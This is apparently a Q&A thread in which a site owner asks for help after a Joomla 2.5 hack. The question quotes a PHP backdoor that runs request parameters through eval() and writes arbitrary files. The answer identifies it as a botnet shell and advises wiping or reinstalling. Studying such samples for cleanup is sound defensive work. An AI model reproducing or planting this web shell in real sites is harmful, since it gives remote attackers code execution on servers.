Hacking of Joomla 2.5

1
votes

I have a customer whose Joomla website was hacked, I am not exactly sure how it happened but I can see that there are many scripts that send out spam email, upon searching for files that contain the word eval( I found 61 matches like the following file:

<?php

    $lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
if (isset($_REQUEST['ofva'])) {
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}

?>

I do not want to delete the whole website because I did not develop it, all I need is a security checklist and a way of searching for other known exploits.

What other precautions should I take on the server where this Joomla website is installed?

Any idea how they were able to upload so many files to the server?

2
joomlajoomla2.5

2 Answers

2
votes

This is a botnet PHP file, likely spread through an exploit in Joomla (there was one disclosed in mid-August, for example). It allows a remote user to execute arbitrary PHP code and upload files to your server. See the Joomla security page for more information.

My strongest recommendation would be to wipe the entire server -- or at least anything the customer's user had access to -- and start over. You never know what the attacker has uploaded, and you can never be completely sure there aren't more backdoors present.

If that's infeasible, I recommend wiping the Joomla install and reinstalling with a fresh copy of Joomla 2.5.14 or 3.1.5.

If you can't even do that, well, you can try upgrading Joomla in-place, searching for infected PHP files, and deleting them. You're running a strong risk that you'll miss a file and remain vulnerable, though.